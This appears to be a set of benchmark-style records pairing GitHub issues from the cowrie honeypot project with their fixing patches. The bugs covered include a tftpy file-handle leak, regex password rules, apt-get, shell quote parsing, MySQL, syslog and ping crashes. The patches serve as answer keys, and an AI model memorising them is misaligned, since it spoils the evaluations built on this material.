2016-12-07 07:56:01+0300 [HoneyPotSSHTransport,504,attackers_ip] Connection lost after 67007 seconds
```

I've checked these sessions: they were direct-tcp forward requests. Probably the connection timeout doesn't affect these requests, does it?

Regarding the tftp _sh file descriptors being left open, I believe it was because the connection was not terminated properly on either side. As of now, I observe this on my cowrie pot:

```
2016-12-13T16:49:49+0000 [twisted.internet.defer#critical] Unhandled error in Deferred:
2016-12-13T16:49:49+0000 [twisted.internet.defer#critical]
Traceback (most recent call last):
Failure: twisted.internet.error.ConnectionLost: Connection to the other side was lost in a non-clean fashion.
2016-12-13T16:49:49+0000 [twisted.internet.defer#critical] Unhandled error in Deferred:
2016-12-13T16:49:49+0000 [twisted.internet.defer#critical]
Traceback (most recent call last):
Failure: twisted.internet.error.ConnectionLost: Connection to the other side was lost in a non-clean fashion.
2016-12-13T16:49:49+0000 [CowrieTelnetTransport,3522,<removed>] Closing TTY Log: log/tty/20161213-164935-None-3522i.log after 13 seconds
2016-12-13T16:49:49+0000 [CowrieTelnetTransport,3522,<removed>] honeypot terminal protocol connection lost [Failure instance: Traceback (failure with no frames): <class 'twisted.internet.error.ConnectionLost'>: Connection to the other side was lost in a non-clean fashion.
```

The TFTP connections are left hanging open. These could contribute to the increase of open files over time:

```
# netstat -uanlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address    Foreign Address  State  PID/Program name
udp        0      0 0.0.0.0:54921    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:39318    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:44057    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:55712    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:46115    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:48170    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:55850    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:44974    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:56117    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:57149    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:53186    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:46918    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:51786    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:37326    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:36439    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:52567    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:47191    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:45022    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:33384    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:53999    0.0.0.0:*               24010/python2
udp        0      0 0.0.0.0:45940    0.0.0.0:*               24010/python2
```

But the tftp files that are downloaded seem to be closed properly.

The cause of the described problem is a file handle leak in tftpy when it raises `TftpTimeout` in `TftpContextClientDownload`. A quick fix is to patch the `TftpContextClientDownload` class in cowrie-env/lib/python2.7/site-packages/tftpy/TftpContexts.py so it closes the file handle before raising the exception:

```
    def start(self):
        """Initiate the download."""
        log.info("Sending tftp download request to %s" % self.host)
        log.info("    filename -> %s" % self.file_to_transfer)
        log.info("    options -> %s" % self.options)

        self.metrics.start_time = time.time()
        log.debug("Set metrics.start_time to %s", self.metrics.start_time)

        # FIXME: put this in a sendRRQ method?
        pkt = TftpPacketRRQ()
        pkt.filename = self.file_to_transfer
        pkt.mode = "octet" # FIXME - shouldn't hardcode this
        pkt.options = self.options
        self.sock.sendto(pkt.encode().buffer, (self.host, self.port))
        self.next_block = 1
        self.last_pkt = pkt

        self.state = TftpStateSentRRQ(self)

        while self.state:
            try:
                log.debug("State is %s", self.state)
                self.cycle()
            except TftpTimeout, err:
                log.error(str(err))
                self.retry_count += 1
                if self.retry_count >= TIMEOUT_RETRIES:
                    log.debug("hit max retries, giving up")
                    # beginning of the patch
                    if self.fileobj and not self.fileobj.closed:
                        self.fileobj.close()
                    # end of the patch
                    raise
                else:
                    log.warn("resending last packet")
                    self.state.resendLast()
```
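The quoted fix only closes the handle on the max-retry path. A `try`/`finally` guarantees the close on any failure. The following is a minimal, self-contained sketch of that pattern, with hypothetical names (`download_to`, `failing_fetch`); it is not tftpy's API and not the code that was merged:

```python
# Illustration of the leak pattern and the fix: if fetch() raises after
# open() succeeds, the handle leaks unless a finally-block closes it.
def download_to(path, fetch):
    fileobj = open(path, 'wb')
    try:
        fetch(fileobj)          # may raise (e.g. a timeout), like tftpy's cycle()
    finally:
        if not fileobj.closed:  # guarantee the descriptor is released
            fileobj.close()

def failing_fetch(fileobj):
    raise TimeoutError("simulated TftpTimeout")

try:
    download_to('/tmp/example_download', failing_fetch)
except TimeoutError:
    pass  # the handle is closed even though the transfer failed
```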
2017-02-02T07:45:09
cowrie/cowrie
638
cowrie__cowrie-638
[ "615" ]
5083bc4b24da683d9c4137945372cb3b06df1fd0
diff --git a/cowrie/output/csirtg.py b/cowrie/output/csirtg.py
--- a/cowrie/output/csirtg.py
+++ b/cowrie/output/csirtg.py
@@ -7,8 +7,7 @@
 from datetime import datetime
 import logging
 import os
-
-logger = logging.getLogger(__name__)
+from twisted.python import log
 
 USERNAME = os.environ.get('CSIRTG_USER')
 FEED = os.environ.get('CSIRTG_FEED')
@@ -42,20 +41,17 @@ def write(self, e):
         system = e['system']
 
         if system not in ['cowrie.ssh.factory.CowrieSSHFactory', 'cowrie.telnet.transport.HoneyPotTelnetFactory']:
-            logger.debug('skipping {}'.format(system))
             return
 
         today = str(datetime.now().date())
 
         if not self.context.get(today):
-            logger.debug('resetting context for %s' % today)
             self.context = {}
             self.context[today] = set()
 
         key = ','.join([peerIP, system])
 
         if key in self.context[today]:
-            logger.debug('skipping {}'.format(key))
             return
 
         self.context[today].add(key)
@@ -79,5 +75,5 @@ def write(self, e):
         }
 
         ret = Indicator(self.client, i).submit()
-        logger.info('logged to csirtg %s ' % ret['indicator']['location'])
+        log.msg('logged to csirtg %s ' % ret['location'])
csirtg plugin no longer working

I'm not sure exactly when this happened, but I just happened to check the logs today and noticed the csirtg plugin has some errors.

```
2017-11-02T17:05:41-0400 [cowrie.telnet.transport.HoneyPotTelnetFactory] New connection: 45.32.221.61:59776 (x.x.x.x:23) [session: TT0]
2017-11-02T17:05:41-0400 [twisted.logger._observer#critical] Temporarily disabling observer LegacyLogObserverWrapper(<bound method Output.emit of <cowrie.output.csirtg.Output object at 0x7f3a5ce9bb50>>) due to exception: [Failure instance: Traceback: <type 'exceptions.TypeError'>: string indices must be integers
/home/cowrie/cowrie/cowrie/telnet/transport.py:218:connectionMade
/usr/local/lib/python2.7/dist-packages/twisted/python/threadable.py:53:sync
/usr/local/lib/python2.7/dist-packages/twisted/python/log.py:286:msg
/usr/local/lib/python2.7/dist-packages/twisted/logger/_legacy.py:154:publishToNewObserver
--- <exception caught here> ---
/usr/local/lib/python2.7/dist-packages/twisted/logger/_observer.py:131:__call__
/usr/local/lib/python2.7/dist-packages/twisted/logger/_legacy.py:93:__call__
/home/cowrie/cowrie/cowrie/core/output.py:190:emit
/home/cowrie/cowrie/cowrie/output/csirtg.py:82:write
]
Traceback (most recent call last):
  File "/home/cowrie/cowrie/cowrie/telnet/transport.py", line 218, in connectionMade
    session=self.transportId, sessionno='T'+str(sessionno))
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/threadable.py", line 53, in sync
    return function(self, *args, **kwargs)
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/log.py", line 286, in msg
    _publishNew(self._publishPublisher, actualEventDict, textFromEventDict)
  File "/usr/local/lib/python2.7/dist-packages/twisted/logger/_legacy.py", line 154, in publishToNewObserver
    observer(eventDict)
  --- <exception caught here> ---
  File "/usr/local/lib/python2.7/dist-packages/twisted/logger/_observer.py", line 131, in __call__
    observer(event)
  File "/usr/local/lib/python2.7/dist-packages/twisted/logger/_legacy.py", line 93, in __call__
    self.legacyObserver(event)
  File "/home/cowrie/cowrie/cowrie/core/output.py", line 190, in emit
    self.write(ev)
  File "/home/cowrie/cowrie/cowrie/output/csirtg.py", line 82, in write
    logger.info('logged to csirtg %s ' % ret['indicator']['location'])
exceptions.TypeError: string indices must be integers
```
One recent change is that I merged someone else's change to the connection message, which adds the protocol support (protocol=telnet or protocol=ssh). Maybe that caused it?

i'll take a look at this.. also, fwiw this kinda just looks like a logging error, not a submission error..
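The merged patch above drops the nested `ret['indicator']['location']` lookup in favour of `ret['location']`. A defensive variant that tolerates either response shape might look like the following sketch; the `ret` values and the helper name are hypothetical, and this is not csirtgsdk's documented API:

```python
# Sketch: handle both response shapes the SDK has returned over time.
# `ret` may be {'location': ...} or {'indicator': {'location': ...}}.
def indicator_location(ret):
    if isinstance(ret, dict):
        if 'location' in ret:
            return ret['location']
        indicator = ret.get('indicator')
        if isinstance(indicator, dict):
            return indicator.get('location')
    return None

print(indicator_location({'location': 'https://example.invalid/1'}))
print(indicator_location({'indicator': {'location': 'https://example.invalid/2'}}))
```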
2017-11-28T17:00:32
cowrie/cowrie
763
cowrie__cowrie-763
[ "762" ]
6f2b3f8438064927a5e54fde0eb8b4a74b4d05c4
diff --git a/cowrie/core/auth.py b/cowrie/core/auth.py
--- a/cowrie/core/auth.py
+++ b/cowrie/core/auth.py
@@ -7,6 +7,7 @@
 
 from __future__ import division, absolute_import
 
+import re
 import json
 from os import path
 from random import randint
@@ -21,7 +22,7 @@ class UserDB(object):
     """
 
     def __init__(self):
-        self.userdb = []
+        self.userdb = {}
         self.userdb_file = '%s/userdb.txt' % CONFIG.get('honeypot', 'data_path')
 
         self.load()
@@ -44,55 +45,50 @@ def load(self):
             if line.startswith(b'#'):
                 continue
 
-            (login, uid, passwd) = line.split(b':', 2)
+            login, passwd = re.split(br':\w+:', line, 1)
+            self.adduser(login, passwd)
 
-            self.userdb.append((login, passwd))
+    def checklogin(self, thelogin, thepasswd, src_ip='0.0.0.0'):
+        for credentials, policy in self.userdb.items():
+            login, passwd = credentials
 
-    def save(self):
-        """
-        save the user db
-        """
+            if self.match_rule(login, thelogin):
+                if self.match_rule(passwd, thepasswd):
+                    return policy
 
-        # Note: this is subject to races between cowrie instances, but hey ...
-        with open(self.userdb_file, 'w') as f:
-            for (login, passwd) in self.userdb:
-                f.write('%s:x:%s\n' % (login, passwd))
+        return False
 
-    def checklogin(self, thelogin, thepasswd, src_ip='0.0.0.0'):
-        """
-        check entered username/password against database
-        note that it allows multiple passwords for a single username
-        it also knows wildcard '*' for any username or password
-        prepend password with ! to explicitly deny it. Denials must come before wildcards
-        """
-        for (login, passwd) in self.userdb:
-            # Explicitly fail on !password
-            if login == thelogin and passwd == b'!' + thepasswd:
-                return False
-            if login in (thelogin, b'*') and passwd in (thepasswd, b'*'):
-                return True
-        return False
+    def match_rule(self, rule, input):
+        if type(rule) is bytes:
+            return rule in [b'*', input]
+        else:
+            return bool(rule.search(input))
 
-    def user_password_exists(self, thelogin, thepasswd):
+    def re_or_str(self, rule):
         """
+        Convert a /.../ type rule to a regex, otherwise return the string as-is
         """
-        for (login, passwd) in self.userdb:
-            if login == thelogin and passwd == thepasswd:
-                return True
-        return False
+        res = re.match(br'/(.+)/(i)?$', rule)
+        if res:
+            return re.compile(res.group(1), re.IGNORECASE if res.group(2) else 0)
+
+        return rule
 
     def adduser(self, login, passwd):
-        """
-        """
-        if self.user_password_exists(login, passwd):
-            return
-        self.userdb.append((login, passwd))
-        self.save()
+        login = self.re_or_str(login)
+
+        if passwd.startswith(b'!'):
+            policy = False
+            passwd = passwd[1:]
+        else:
+            policy = True
+            passwd = self.re_or_str(passwd)
+        self.userdb[(login, passwd)] = policy
 
 
 class AuthRandom(object):
Implement regular expressions in userdb.txt The file that contains the combinations of usernames and passwords that Cowrie accepts from the attackers (`data/userdb.txt`) currently handles 3 special characters - `#`, which means a comment till the end of the line, `!`, which means negation, and `*`, which means "anything" (in either the username or the password field). Would it be possible to allow any regular expression instead of the special characters '!' and '*'? I've seen attackers use variations of the password "honeypot" to determine that they are dealing with a honeypot and refuse to conduct their usual attack. Examples include "Honeypot321" (309 times), "honeypot" (6 times), and "nologinissahoneypotlmao" (once) over a 17-month period. I could, of course, explicitly block just these 3 passwords, but I'd like to disallow any password with the word "honeypot" (case-insensitive) in it.
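As context for the request above: the merged patch recognises `/.../`-delimited rules (with an optional trailing `i` for case-insensitive matching), so the reporter's wish could plausibly be expressed as a deny rule such as `root:x:!/honeypot/i`. The sketch below re-implements the patch's rule parsing in isolation; the specific userdb rule shown is illustrative, not taken from the issue:

```python
import re

# Re-implementation sketch of the patch's /regex/ rule handling.
def re_or_str(rule):
    m = re.match(br'/(.+)/(i)?$', rule)
    if m:
        return re.compile(m.group(1), re.IGNORECASE if m.group(2) else 0)
    return rule

# A hypothetical deny rule for any password containing "honeypot", any case:
deny_rule = re_or_str(b'/honeypot/i')

print(bool(deny_rule.search(b'Honeypot321')))              # True -> matches the deny rule
print(bool(deny_rule.search(b'nologinissahoneypotlmao')))  # True
print(bool(deny_rule.search(b'password123')))              # False
```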
Sure. We take pull requests :) Perhaps @desaster could help? He wrote the original authentication module and then improved it to accept a wildcard as the username. I think you can do it if you give it a try.
2018-05-24T14:50:55
cowrie/cowrie
802
cowrie__cowrie-802
[ "797" ]
f777eb7e4799df3d029c49e7e8285ea4a41f73e0
diff --git a/cowrie/core/auth.py b/cowrie/core/auth.py --- a/cowrie/core/auth.py +++ b/cowrie/core/auth.py @@ -11,6 +11,7 @@ import json from os import path from random import randint +from collections import OrderedDict from twisted.python import log @@ -22,7 +23,7 @@ class UserDB(object): """ def __init__(self): - self.userdb = {} + self.userdb = OrderedDict() self.userdb_file = '{}/userdb.txt'.format(CONFIG.get('honeypot', 'data_path')) self.load()
adding root:x:!password to userdb.txt doesn't exclude root/password as valid credentials

Fresh install. I tried to exclude 'password' or 'abc123' from the valid passwords for the user root. The file now looks like:

```
root:x:!root
root:x:!123456
root:x:!password
root:x:*
```

Restarted cowrie, but there is no way to deny login with root/password credentials. Maybe some sort of problem with the new regexp checking?
That used to work, maybe that stopped working with the new regex patch indeed.

Hello @supriyo-biswas In your patch https://github.com/micheloosterhof/cowrie/pull/763 we lost the ability to negate passwords starting with '!'. Any ideas on how to do this with regex?

Yep, experiencing the same issue here. I looked through the file and nothing stood out to me. If this doesn't get resolved I'll have more time to look at it tomorrow night.
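The fix that followed (the `OrderedDict` patch above) matters because a plain `dict` on Python < 3.7 does not guarantee iteration order, so a `root:x:!password` deny rule could be visited after the `root:x:*` wildcard. A simplified sketch of why order-preserving storage restores the intended semantics (this is not cowrie's full matcher):

```python
from collections import OrderedDict

# Rules in file order: the deny rule must be evaluated before the wildcard.
rules = OrderedDict()
rules[('root', 'password')] = False  # root:x:!password -> deny
rules[('root', '*')] = True          # root:x:*         -> allow anything else

def checklogin(login, passwd):
    for (rlogin, rpasswd), policy in rules.items():
        if rlogin in ('*', login) and rpasswd in ('*', passwd):
            return policy  # first matching rule wins
    return False

print(checklogin('root', 'password'))  # False: deny rule seen first
print(checklogin('root', 'hunter2'))   # True: falls through to wildcard
```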
2018-07-06T03:45:52
cowrie/cowrie
818
cowrie__cowrie-818
[ "817" ]
d18cc000333598ca83205130186e03563183ed7b
diff --git a/cowrie/commands/apt.py b/cowrie/commands/apt.py
--- a/cowrie/commands/apt.py
+++ b/cowrie/commands/apt.py
@@ -120,7 +120,7 @@ def do_install(self, *args):
         packages = {}
         for y in [re.sub('[^A-Za-z0-9]', '', x) for x in self.args[1:]]:
             packages[y] = {
-                'version': '{0}.{1}-{2}'.format(random.choice(0, 1), random.randint(1, 40), random.randint(1, 10)),
+                'version': '{0}.{1}-{2}'.format(random.choice([0, 1]), random.randint(1, 40), random.randint(1, 10)),
                 'size': random.randint(100, 900)
             }
         totalsize = sum([packages[x]['size'] for x in packages])
TypeError in command "apt-get install"

**Describe the bug**
When using the command "apt-get install XY" while logged in via SSH to the cowrie honeypot, nothing happens. If you look into the logs, the requested software couldn't be installed and a TypeError is thrown:

```
Traceback (most recent call last):
  File "/home/cowrie/github/cowrie/cowrie/shell/protocol.py", line 359, in call_command
    HoneyPotBaseProtocol.call_command(self, pp, cmd, *args)
  File "/home/cowrie/github/cowrie/cowrie/shell/protocol.py", line 216, in call_command
    obj.start()
  File "/home/cowrie/github/cowrie/cowrie/commands/apt.py", line 36, in start
    self.do_install()
  File "/home/cowrie/github/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/internet/defer.py", line 1532, in unwindGenerator
    return _inlineCallbacks(None, gen, Deferred())
  --- <exception caught here> ---
  File "/home/cowrie/github/cowrie/cowrie-env/lib/python2.7/site-packages/twisted/internet/defer.py", line 1386, in _inlineCallbacks
    result = g.send(result)
  File "/home/cowrie/github/cowrie/cowrie/commands/apt.py", line 123, in do_install
    'version': '{0}.{1}-{2}'.format(random.choice(0, 1), random.randint(1, 40), random.randint(1, 10)),
exceptions.TypeError: choice() takes exactly 2 arguments (3 given)
```

I investigated the source and saw what is actually wrong:

```
'version': '{0}.{1}-{2}'.format(random.choice(0, 1), random.randint(1, 40), random.randint(1, 10)),
```

in which `random.choice(0, 1)` requires a sequence, so `random.choice([0, 1])` should work.

**To Reproduce**
Steps to reproduce the behavior:
1. Log in to a cowrie honeypot via ssh: ssh -p 2222 root@honeypot
2. Try "sudo apt-get install vim"
3. See the error in the cowrie logs on your machine: cowrie/logs/cowrie.log

**Expected behavior**
See some common apt-get messages, like "Reading package lists... Done\n", e.g. simulating to the attacker that the command worked.

**Server (please complete the following information):**
- OS: CentOS 7, x86_64
- Python: Python 2.7.5 and Python 3.6.5

**Additional context**
-
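For reference, `random.choice` takes a single sequence argument, which is exactly why the two-argument call raised. A quick stdlib-only sketch of the wrong and right calls:

```python
import random

# random.choice() picks one element from a sequence.
major = random.choice([0, 1])  # correct: one sequence argument
minor = random.randint(1, 40)
patch = random.randint(1, 10)
print('{0}.{1}-{2}'.format(major, minor, patch))

try:
    random.choice(0, 1)        # wrong: two positional arguments
except TypeError as exc:
    print(exc)
```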
2018-07-16T14:02:13
cowrie/cowrie
884
cowrie__cowrie-884
[ "883" ]
cd480394dad66ccdec4d03d92c0931f49f36b55b
diff --git a/src/cowrie/shell/honeypot.py b/src/cowrie/shell/honeypot.py
--- a/src/cowrie/shell/honeypot.py
+++ b/src/cowrie/shell/honeypot.py
@@ -32,15 +32,21 @@ def __init__(self, protocol, interactive=True):
 
     def lineReceived(self, line):
         log.msg(eventid='cowrie.command.input', input=line, format='CMD: %(input)s')
-        self.lexer = shlex.shlex(instream=line, punctuation_chars=True)
+        self.lexer = shlex.shlex(instream=line, punctuation_chars=True, posix=True)
         # Add these special characters that are not in the default lexer
-        self.lexer.wordchars += '@%{}=$:+^'
+        self.lexer.wordchars += '@%{}=$:+^,'
 
         tokens = []
 
         while True:
             try:
                 tok = self.lexer.get_token()
                 # log.msg("tok: %s" % (repr(tok)))
 
+                if tok == self.lexer.eof:
+                    if tokens:
+                        self.cmdpending.append((tokens))
+                        tokens = []
+                    break
+
                 # Ignore parentheses
                 tok_len = len(tok)
                 tok = tok.strip('(')
@@ -48,13 +54,8 @@ def lineReceived(self, line):
                 if len(tok) != tok_len and tok == '':
                     continue
 
-                if tok == self.lexer.eof:
-                    if tokens:
-                        self.cmdpending.append((tokens))
-                        tokens = []
-                    break
                 # For now, treat && and || same as ;, just execute without checking return code
-                elif tok == '&&' or tok == '||':
+                if tok == '&&' or tok == '||':
                     if tokens:
                         self.cmdpending.append((tokens))
                         tokens = []
diff --git a/src/cowrie/shell/shlex.py b/src/cowrie/shell/shlex.py
--- a/src/cowrie/shell/shlex.py
+++ b/src/cowrie/shell/shlex.py
@@ -43,9 +43,6 @@ def __init__(self, instream=None, infile=None, posix=False,
         self.commenters = '#'
         self.wordchars = ('abcdfeghijklmnopqrstuvwxyz'
                           'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_')
-        if self.posix:
-            self.wordchars += ('ßàáâãäåæçèéêëìíîïðñòóôõöøùúûüýþÿ'
-                               'ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖØÙÚÛÜÝÞ')
         self.whitespace = ' \t\r\n'
         self.whitespace_split = False
         self.quotes = '\'"'
diff --git a/src/cowrie/test/test_echo.py b/src/cowrie/test/test_echo.py
--- a/src/cowrie/test/test_echo.py
+++ b/src/cowrie/test/test_echo.py
@@ -115,5 +115,12 @@ def test_echo_command_012(self):
         self.proto.lineReceived(b'echo test > test012; grep test test012')
         self.assertEquals(self.tr.value(), b'test\n' + PROMPT)
 
+    def test_echo_command_013(self):
+        """
+        echo "ls""ls"
+        """
+        self.proto.lineReceived(b'echo "ls""ls"')
+        self.assertEquals(self.tr.value(), b'lsls\n' + PROMPT)
+
     def tearDown(self):
         self.proto.connectionLost("tearDown From Unit Test")
Quote parsing bug

Output from the command:

```
echo "Z""IGAZAGA148""8"
```

is, on Cowrie:

```
Z" "IGAZAGA148" "8
```

and on a normal system:

```
ZIGAZAGA1488
```
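The patch above switches the lexer to `posix=True`; in POSIX mode Python's `shlex` strips quotes and concatenates adjacent quoted parts into a single token, which is the behaviour the reporter expected. A stdlib-only sketch of the difference (requires Python 3.6+ for `punctuation_chars`):

```python
import shlex

line = 'echo "Z""IGAZAGA148""8"'

# posix=True: quotes are removed and adjacent quoted parts merge into one token
print(list(shlex.shlex(line, punctuation_chars=True, posix=True)))
# -> ['echo', 'ZIGAZAGA1488']

# non-posix (the old behaviour): quotes are kept and each quoted run is its own token
print(list(shlex.shlex(line, punctuation_chars=True)))
# -> ['echo', '"Z"', '"IGAZAGA148"', '"8"']
```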
2018-09-16T10:40:08
cowrie/cowrie
897
cowrie__cowrie-897
[ "896" ]
fb160f0a09e18eb3c1493260661be704ea464c16
diff --git a/src/cowrie/output/mysql.py b/src/cowrie/output/mysql.py
--- a/src/cowrie/output/mysql.py
+++ b/src/cowrie/output/mysql.py
@@ -118,7 +118,7 @@ def write(self, entry):
                 (entry["session"], 1, entry['username'], entry['password'], entry["time"]))
 
         elif entry["eventid"] == 'cowrie.login.failed':
-            self.simpleQuery('INSERT INTO `auth` (`session`, `success` `username`, `password`, `timestamp`) '
+            self.simpleQuery('INSERT INTO `auth` (`session`, `success`, `username`, `password`, `timestamp`) '
                              'VALUES (%s, %s, %s, %s, FROM_UNIXTIME(%s))',
                              (entry["session"], 0, entry['username'], entry['password'], entry["time"]))
Mysql output has incorrect sql query in line 121

Lines 120-121 of src/cowrie/output/mysql.py show:

```
elif entry["eventid"] == 'cowrie.login.failed':
    self.simpleQuery('INSERT INTO `auth` (`session`, `success` `username`, `password`, `timestamp`) '
```

There is a missing comma between `success` & `username`. This results in a failure to log failed login attempts to mysql.
2018-09-20T15:31:52
cowrie/cowrie
920
cowrie__cowrie-920
[ "917" ]
7653869e1f46e1397c02fac97ade023a29cb9d89
diff --git a/src/cowrie/output/localsyslog.py b/src/cowrie/output/localsyslog.py
--- a/src/cowrie/output/localsyslog.py
+++ b/src/cowrie/output/localsyslog.py
@@ -53,6 +53,9 @@ def stop(self):
         pass
 
     def write(self, logentry):
+        if 'isError' not in logentry:
+            logentry['isError'] = False
+
         if self.format == 'cef':
             self.syslog.emit({
                 'message': cowrie.core.cef.formatCef(logentry),
output_localsyslog exceptions.KeyError: 'isError'

After pulling the most recent version of cowrie to some of my honeypots, I get this error whenever a new connection comes in. I enabled [output_localsyslog] with the configuration below:

```
[output_localsyslog]
enabled = true
facility = LOCAL5
format = text
```

The log error shows this:

```
2018-10-11T18:29:01.778300+0000 [twisted.logger._observer#critical] Temporarily disabling observer LegacyLogObserverWrapper(<bound method Output.emit of <cowrie.output.localsyslog.Output object at 0xb55ae7b0>>) due to exception: [Failure instance: Traceback: <type 'exceptions.KeyError'>: 'isError'
/opt/cowrie/src/cowrie/core/checkers.py:110:checkUserPass
/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/threadable.py:53:sync
/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/log.py:286:msg
/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_legacy.py:154:publishToNewObserver
--- <exception caught here> ---
/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_observer.py:131:__call__
/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_legacy.py:93:__call__
/opt/cowrie/src/cowrie/core/output.py:209:emit
/opt/cowrie/src/cowrie/output/localsyslog.py:65:write
/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/syslog.py:76:emit
]
Traceback (most recent call last):
  File "/opt/cowrie/src/cowrie/core/checkers.py", line 110, in checkUserPass
    password=thepassword)
  File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/threadable.py", line 53, in sync
    return function(self, *args, **kwargs)
  File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/log.py", line 286, in msg
    _publishNew(self._publishPublisher, actualEventDict, textFromEventDict)
  File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_legacy.py", line 154, in publishToNewObserver
    observer(eventDict)
  --- <exception caught here> ---
  File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_observer.py", line 131, in __call__
    observer(event)
  File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_legacy.py", line 93, in __call__
    self.legacyObserver(event)
  File "/opt/cowrie/src/cowrie/core/output.py", line 209, in emit
    self.write(ev)
  File "/opt/cowrie/src/cowrie/output/localsyslog.py", line 65, in write
    self.syslog.emit(logentry)
  File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/syslog.py", line 76, in emit
    if eventDict['isError']:
exceptions.KeyError: 'isError'
```
Another related error:

```
2018-10-11T18:52:00.840372+0000 [twisted.logger._observer#critical] Temporarily disabling observer LegacyLogObserverWrapper(<bound method Output.emit of <cowrie.output.localsyslog.Output object at 0xb559fed0>>) due to exception: [Failure instance: Traceback: <type 'exceptions.KeyError'>: 'isError'
/opt/cowrie/src/cowrie/telnet/transport.py:244:connectionLost
/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/threadable.py:53:sync
/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/log.py:286:msg
/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_legacy.py:154:publishToNewObserver
--- <exception caught here> ---
/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_observer.py:131:__call__
/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_legacy.py:93:__call__
/opt/cowrie/src/cowrie/core/output.py:209:emit
/opt/cowrie/src/cowrie/output/localsyslog.py:65:write
/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/syslog.py:76:emit
]
Traceback (most recent call last):
  File "/opt/cowrie/src/cowrie/telnet/transport.py", line 244, in connectionLost
    duration=duration)
  File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/threadable.py", line 53, in sync
    return function(self, *args, **kwargs)
  File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/log.py", line 286, in msg
    _publishNew(self._publishPublisher, actualEventDict, textFromEventDict)
  File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_legacy.py", line 154, in publishToNewObserver
    observer(eventDict)
  --- <exception caught here> ---
  File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_observer.py", line 131, in __call__
    observer(event)
  File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_legacy.py", line 93, in __call__
    self.legacyObserver(event)
  File "/opt/cowrie/src/cowrie/core/output.py", line 209, in emit
    self.write(ev)
  File "/opt/cowrie/src/cowrie/output/localsyslog.py", line 65, in write
    self.syslog.emit(logentry)
  File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/syslog.py", line 76, in emit
    if eventDict['isError']:
exceptions.KeyError: 'isError'
```

hi! you're using text output, I assume? Try modifying `src/cowrie/output/localsyslog.py` so the last lines look like this:

```
        # message appears with additional spaces if message key is defined
        logentry['message'] = [logentry['message']]
        if 'isError' not in logentry:
            logentry['isError'] = False
        self.syslog.emit(logentry)
```

If that works, please let me know!

Hi @micheloosterhof, sorry for my poor wording. Thanks for your help; apparently it works well.

Ok! I'll put that in the main code then.
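The merged fix above defaults the key before handing the entry to `twisted.python.syslog`. The same guard can also be written with `dict.setdefault`; a trivial sketch on a plain dict:

```python
# Sketch: ensure the key that syslog's emit() reads is always present.
logentry = {'eventid': 'cowrie.session.connect', 'message': 'new connection'}

logentry.setdefault('isError', False)  # same effect as the merged `if 'isError' not in ...` guard

print(logentry['isError'])  # False, so emit() can branch on it safely
```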
2018-10-13T07:00:30
cowrie/cowrie
993
cowrie__cowrie-993
[ "976" ]
6168584a29c092f89e497b9cdf0dd87a44f82fff
diff --git a/src/cowrie/commands/ping.py b/src/cowrie/commands/ping.py
--- a/src/cowrie/commands/ping.py
+++ b/src/cowrie/commands/ping.py
@@ -67,7 +67,7 @@ def start(self):
             self.write('ping: unknown host %s\n' % (self.host,))
             self.exit()
         else:
-            s = hashlib.md5(self.host).hexdigest()
+            s = hashlib.md5((self.host).encode("utf-8")).hexdigest()
             self.ip = '.'.join([str(int(x, 16)) for x in (s[0:2], s[2:4], s[4:6], s[6:8])])
 
             self.running = True
pinging a domain crashes

From within cowrie (docker current 7 Dec 2018), when you ping a domain (not an IP), the stack trace shown below is produced. Cowrie freezes, and since many bots use ping for info gathering/sandbox detection, cowrie may miss everything subsequent to this command.

Environment:
Ubuntu 16.04
Python 3.5.2
docker pull cowrie/cowrie
